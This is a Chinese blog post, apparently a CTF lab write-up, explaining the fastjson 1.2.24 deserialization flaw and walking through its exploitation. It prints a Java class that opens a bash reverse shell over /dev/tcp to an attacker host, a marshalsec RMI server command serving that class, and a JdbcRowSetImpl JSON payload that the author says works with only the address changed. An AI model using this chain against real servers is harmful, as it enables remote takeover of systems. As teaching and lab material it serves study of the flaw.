fastjson反序列化漏洞原理

于 2024-05-20 23:13:23 发布
阅读量897 收藏 13
点赞数 21
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73649671/article/details/139077487
版权

fastjson反序列化漏洞原理

一、fastjson简介

fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象

提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则反过来将 JSON 字符串转换成对象。

二、fastjson反序列化漏洞原理

在反序列化的时候,会进入parseField方法,进入该方法后,就会调用setValue(object, value)方法,在这里,会执行构造的恶意代码,最后造成代码执行。 那么通过以上步骤,我们可以知道该漏洞的利用点有两个,第一是需要我们指定一个类,这个类的作用是为了让程序获取这个类来进行反序列化操作。第二是需要将需要执行的代码提供给程序,所以这里使用了rmi。 然后反序列化的时候会去请求rmi服务器,地址为: dnslog.cn/aaa。然后加载aaa这个恶意class文件从而造成代码执行。

三、fastjson反序列化漏洞的前提条件

1.目标服务器存在fastjson。  
2.没有对用户传输的数据进行严格过滤

四、攻击步骤

1.黑客使用payload攻击主机A(该payload需要指定rmi/ldap地址)  
2.主机A引发反序列化漏洞,进行ldap远程方法调用,去连接主机B的9999端口。  
3.主机B的LDAP服务指定加载主机C的恶意java类,所以主机A通过主机B的LDAP服务最终加载并执行主机C的恶意java类。  
4.主机A执行恶意Java类,主机B获得反弹shell,控制主机A。

1.2.24-rce

1.开启环境,抓包判断是否是fastjson框架

image

开启抓包确定是不是fastjson框架,通过修改请求包判断是否是fastjson框架 ,应为fastjson有一个严格的格式才能解析,否则会报错

127d8b91196545deb7dafd493603975c

2.创建恶意类文件HackerFile.java

在/var/www/html下创建,http服务可访问(注意,要确保http服务开的,可以在网站目录用python起一个http服务)。使用javac编译 HackerFile.java文件 生成一个类文件

import java.lang.Runtime;
import java.lang.Process;
public class HackerFile {
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.77.129/9999 0>&1"});
            p.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

image

3.开启rmi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.77.129/#HackerFile" 6666

下载类文件时需要添加#

使用jar包开启rmi服务,使得他人可以访问、并将文件下载到本地去执行

image

4.开启nc监听

image

5.修改数据包实现下载

数据包内容:【以后利用fastjson,只需修改访问地址,其他是固定的】

{
	"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.77.129:6666/HackerFile",
"autoCommit":true
	}
}

6.点击go,发现反弹shell成功

image

7.get shell的过程

发送数据包之后,靶机通过rmi 6666端口 下载了恶意类文件并且执行了它

该文件里有kali 反弹shell的命令,故实现了get shell

【/bin/bash","-c","bash -i >& /dev/tcp/192.168.77.129/9999 0>&1】

ef601f8fa48fa662c4ac0b8b00868832

DemoCTFer
关注
  • 21
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastjson漏洞——举例说明漏洞以及原理分析——一看就会
可乐多点冰的博客
09-01 4838
最近公司一直说fastjson漏洞,比较很严重,要换成其他的json工具。怀着好奇的心情去看了一些文章,现在简单的记录一下。 1、漏洞分析 总体而言是一个叫做autoType的在搞事情。那么autoType是什么呢? 我们写一段简单代码演示一下: public class JSONController { public static void main(String[] args) throws ParseException { Province province = new
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6828
fastjson反序列化漏洞原理及利用
网络安全深入学习第七课——热门框架漏洞(RCE— Fastjson反序列化漏洞
p36273的博客
09-18 1596
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
【091期】为什么要弃坑阿里开源的 FastJson?三种利用链漏洞分析
最新发布
pckzzy119的博客
04-30 488
关于面试刷题也是有方法可言的,建议最好是按照专题来进行,然后由基础到高级,由浅入深来,效果会更好。Java基础部分算法与编程数据库部分流行的框架与新技术(Spring+SpringCloud+SpringCloudAlibaba)这份面试文档当然不止这些内容,实际上像JVM、设计模式、ZK、MQ、数据结构等其他部分的面试内容均有涉及,因为文章篇幅,就不全部在这里阐述了。
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3619
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
FastJson中AutoType反序列化漏洞
qq_53058639的博客
02-20 1169
Fastjson
Fastjson反序列化漏洞史1
08-03
Fastjson 反序列化漏洞史2020年05月08日漏洞分析 (/category/vul-analysis/) · 404专栏 (/category/404
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令...
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 2988
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
Fastjson反序列化讲解
weixin_45597678的博客
01-02 6124
文章目录一、Java自省机制简介二、漏洞分析三、漏洞利用 一、Java自省机制简介 Java自省机制是Java语言对JavaBean类属性、事件的一种缺省转换方式,对于类的私有属性需要设置set/get方法来获取和设置值的这是一种默认规则,而在Java中存在一个API让我们可以不用去了解这个规则这个API在包java.beans中的,通过这个API可以直接掉类中get/set方法去读取和设置类属性值 import java.beans.PropertyDescriptor; import java.la
Fastjson反序列化漏洞(自学)
m0_64481831的博客
03-04 1047
Fastjson是Java的一个库,可以将Java对象转化为JSON格式的字符串,也可以将JSON格式的字符串转化为Java对象。Fastjson调用toJSONString()方法即可将对象转换成JSON字符串,parseObject()方法将JSON字符串转换成对象。Fastjson是Java的一个库,调用toJSONString方法将对象转换成字符串,调用parseObject方法将字符串转换为对象。
【HACKER KID: 1.0.1靶机】
qq_40646572的博客
05-23 1370
信息搜集 开启靶机。 使用nmap扫描,发现存活靶机,192.168.85.145,靶机开放端口为53,80,9999。 进一步搜集下对应段开启的服务。 发现,9999端口开启的是tornado服务。 先打开web网站,看下。 好像再提示挖掘?还是使用dig工具?先放下,继续搜集信息。 #app.html页面源码,发现存在提示,给了一个参数。这个参数应该是页面数,先尝试下。 发现page_no=21时,返回数据不同。 提示我们这个网站还绑定了一个域名,先添加到/etc/hosts文本中。
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2168
Fastjson反序列化漏洞复现
FastJson 漏洞复现
来日可期的博客
09-11 1820
FastJson 1.2.24 反序列化导致任意命令执行漏洞Fastjson 1.2.47 远程命令执行漏洞
学了那么久Python还什么都做不了,我觉得你该试试这个方法了
热门推荐
龙叔的博客
11-08 1万+
答应我,别再做无用功了
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用链分析(TemplatesImpl,JdbcRowSetImpl)
m0_64685672的博客
02-03 2780
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值